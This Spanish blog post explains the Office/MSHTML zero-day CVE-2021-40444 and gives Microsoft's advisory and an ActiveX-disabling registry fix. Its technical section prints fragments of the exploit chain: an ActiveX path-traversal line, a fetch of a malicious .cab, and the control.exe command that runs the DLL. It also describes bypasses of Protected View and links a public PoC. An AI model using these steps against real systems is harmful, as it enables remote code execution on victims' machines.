Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Entradas populares

PostHeaderIcon Nueva y grave vulnerabilidad en documentos Office para Windows




Microsoft advierte sobre un nuevo grave fallo de día cero explotada activamente que afecta a Internet Explorer y que se utiliza para secuestrar sistemas Windows vulnerables al aprovechar documentos de Office dañinos. La vulnerabilidad ha sido comprobada y funciona en Office 2019 y Office 365 en Windows 10. De momento no hay parche disponible, pero si algunas mitigaciones como abrir documento vista protegida o deshabilitar componente ActiveX.




Nuevo ataque 0-day dirigido a usuarios de Windows con documentos de Microsoft Office


Rastreado como CVE-2021-40444 (puntuación de gravedad CVSS: 8.8), la falla de ejecución remota de código tiene sus raíces en MSHTML (también conocido como Trident), un motor de navegador patentado para Internet Explorer ahora descontinuado y que se usa en Office para representar contenido web en su interior. Documentos de Word, Excel y PowerPoint.

"Microsoft está investigando informes de una vulnerabilidad de ejecución remota de código en MSHTML que afecta a Microsoft Windows. Microsoft está al tanto de ataques dirigidos que intentan explotar esta vulnerabilidad mediante el uso de documentos de Microsoft Office especialmente diseñados",ha dicho Microsoft


"Un atacante podría crear un control ActiveX malicioso para ser utilizado por un documento de Microsoft Office que aloja el motor de procesamiento del navegador. El atacante tendría que convencer al usuario de que abra el documento malicioso. Los usuarios cuyas cuentas estén configuradas para tener menos derechos de usuario en el sistema podría verse menos afectado que los usuarios que operan con derechos de usuario administrativo ", agregó.

El fabricante de Windows dio crédito a los investigadores de EXPMON y Mandiant por informar sobre la falla, aunque la compañía no reveló detalles adicionales sobre la naturaleza de los ataques, la identidad de los adversarios que explotan este día cero o sus objetivos a la luz de los ataques del mundo real. .

EXPMON, en un tweet, señaló que encontró la vulnerabilidad después de detectar un "ataque de día cero altamente sofisticado" dirigido a los usuarios de Microsoft Office, y agregó que transmitió sus hallazgos a Microsoft el domingo. "El exploit utiliza fallas lógicas, por lo que la explotación es perfectamente confiable (y peligrosa)", dijeron los investigadores de EXPMON.

Sin embargo, vale la pena señalar que el ataque actual se puede evitar si Microsoft Office se ejecuta con configuraciones predeterminadas, donde los documentos descargados de la web se abren en Vista protegida o Application Guard for Office, que está diseñado para evitar que archivos no confiables accedan a recursos confiables. en el sistema comprometido.

Recursos afectados:

  • Sistemas operativos Windows a 10.
  • Windows Server 2008 a 2019.

Mitigaciones


 

Aunque en primera instancia se ha dicho que el modo de vista protegida que incorpora Office mitigaba su impacto, es bastante fácil para los atacantes sortear esta medida de seguridad. Eso sin tener en cuenta que muchos de los usuarios ignoran estos avisos y permiten la ejecución de código sin pensar en las posibles consecuencias.

Office añade una marca especial conocida como la “Marca de la Web” (MoTW) a todos los documentos descargados desde Internet. De esta forma se alerta de posibles amenazas camufladas en su interior, muchas veces en forma de macros maliciosas. Sin embargo, investigadores como Will Dormann alertan de la posibilidad de evitar que se muestre este aviso utilizando sencillas técnicas.

Por ejemplo, un atacante podría incluir el documento malicioso comprimido dentro de un contenedor como 7Zip, lo que haría que al abrirlo tras descargarlo no se le incorporase la marca de la web y no se abriese en el modo de vista protegida.

También podría presentarse el documento dentro de otro tipo de contenedor como un archivo ISO, que puede abrirse simplemente pulsando dos veces sobre él y en el que no se aplicaría tampoco el modo de vista protegida. Por si fuera poco, a los documentos en otros formatos como RTF, no se les aplica la vista protegida al abrirse, por lo que también pueden usarse para realizar ataques aprovechando esta vulnerabilidad sin despertar sospechas.

 
Se espera que Microsoft, una vez finalizada la investigación, publique una actualización de seguridad como parte de su ciclo de lanzamiento mensual del martes de parches o emita un parche fuera de banda "según las necesidades del cliente". Mientras tanto, el fabricante de Windows insta a los usuarios y organizaciones a deshabilitar todos los controles ActiveX en Internet Explorer para mitigar cualquier posible ataque.  


Deshabilitar ActiveX 

Deshabilitar la instalación de todos los controles ActiveX en Internet Explorer mitiga este ataque. Esto se puede lograr para todos los sitios actualizando el registro. Los controles ActiveX instalados anteriormente seguirán ejecutándose, pero no exponen esta vulnerabilidad.


Para deshabilitar los controles ActiveX en un sistema individual:

     Para deshabilitar la instalación de controles ActiveX en Internet Explorer en todas las zonas, pegue lo siguiente en un archivo de texto y guárdelo con la extensión de archivo .reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]
"1001"=dword:00000003
"1004"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1001"=dword:00000003
"1004"=dword:00000003

 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444

Microsoft está investigando informes de una vulnerabilidad de ejecución remota de código en MSHTML que afecta a Microsoft Windows. Microsoft tiene conocimiento de los ataques dirigidos que intentan aprovechar esta vulnerabilidad mediante el uso de documentos de Microsoft Office especialmente diseñados.

Un atacante podría crear un control ActiveX malicioso para ser utilizado por un documento de Microsoft Office que aloja el motor de renderizado del navegador. El atacante tendría que convencer al usuario de que abra el documento malicioso. Los usuarios cuyas cuentas están configuradas para tener menos derechos de usuario en el sistema podrían verse menos afectados que los usuarios que operan con derechos de usuario administrativos.

Microsoft Defender Antivirus y Microsoft Defender for Endpoint proporcionan detección y protección para la vulnerabilidad conocida. Los clientes deben mantener actualizados los productos antimalware. Los clientes que utilizan actualizaciones automáticas no necesitan realizar ninguna acción adicional. Los clientes empresariales que administran actualizaciones deben seleccionar la compilación de detección 1.349.22.0 o más reciente e implementarla en sus entornos. Las alertas de Microsoft Defender para Endpoint se mostrarán como: "Ejecución sospechosa de archivo Cpl".

Una vez finalizada esta investigación, Microsoft tomará las medidas adecuadas para ayudar a proteger a nuestros clientes. Esto puede incluir proporcionar una actualización de seguridad a través de nuestro proceso de publicación mensual o proporcionar una actualización de seguridad fuera de ciclo, según las necesidades del cliente.

 Análisis Técnico Vulnerabilidad

  • Básicamente el documento contiene un objeto MHTML OLE que es un sitio web alojado en un endpoint controlado por un atacante.
  • El sitio web ejecuta código JavaScript ofuscado que crea una instancia de los controles ActiveX: ActiveXObjectVAR['Script']['location'] = '.cpl:../../../AppData/Local/Temp/Low/championship.inf',
  • El código del sitio web obtiene y abre un archivo .cab desde el endpoint controlado por el atacante: XMLHttpRopen['call'](XMLHttpR, 'GET', 'http://127.0.0.1/test.cab', ![]). Este archivo contiene una DLL maliciosa con extensión .inf.
  • El código del sitio web ejecuta el archivo.inf como un archivo del Panel de control (.cpl) utilizando la utilidad control.exe. Por ejemplo, el código del sitio web puede ejecutar el siguiente comando: control.exe .cpl: ../../../AppData/Local/Temp/championship.inf.
  • La utilidad control.exe se ejecuta como un proceso secundario del proceso que aloja la aplicación de Microsoft Office que abrió el documento de Office, como winword.exe.
  • El archivo DLL malicioso .inf se ejecuta en el contexto de rundll32.exe.

Hasta ahora las mitigaciones contra CVE-2021-40444 iban desde sugerir que se deshabilite ActiveX para la mayoría o todas las zonas de seguridad de Internet Explorer, así como deshabilitar el shell preview en el Explorador de Windows; esto se puede hacer a través de la Política de grupo o localmente a través de claves de registro. Sin embargo, si se rehace la plantilla maliciosa para que no requiera un nuevo control ActiveX estas mitigaciones pueden eludirse. 

Hay varias PoCs que permiten armar documentos maliciosos que explotan CVE-2021-40444, entre los que destacamos sin duda el repo Lockebyte (https://github.com/lockedbyte/CVE-2021-40444) que contiene varios scripts y htmls que reproducen el exploit y nos facilitan la vida:

Fuentes:

https://thehackernews.com/2021/09/new-0-day-attack-targeting-windows.html
https://www.hackplayers.com/2021/09/parche-para-cve-2021-40444-mshtml.html


0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.